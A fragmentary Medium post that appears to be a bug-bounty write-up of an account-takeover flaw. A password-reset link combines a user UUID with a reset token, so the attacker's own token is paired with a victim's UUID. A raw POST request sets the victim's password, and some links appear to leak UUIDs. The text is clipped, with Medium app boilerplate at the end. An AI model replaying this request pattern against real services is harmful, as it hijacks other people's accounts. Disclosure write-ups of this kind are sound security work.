Theoretically Possible To Practical Account Takeover

POC

  1. Created two accounts with email and noted the primary key of both accounts which was UUID.
  2. Went to the reset password function and entered the email id and got the reset password link which kind of looked like this
https://domain.tld/changePassword/{user-primary-key-id}/{reset-token}
https://domain.tld/changePassword/{victim-primary-key-id}/{attacker-reset-token}
POST /changePassword/62c4ffb0-be57-11e8-a68e-8d01686939c8/378fce7754fcdadebb6de5d778753c9916ffed192c942756b45bfeabd4e856f00799a6db002a292eb5cfe007208cc7b1 HTTP/1.1
{"password":"urhacked"}
https://domain.tld/?source=4vyryrtfhf
https://domain.tld/fast/4vyryrtfhf
SEE VICTIM UUID

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store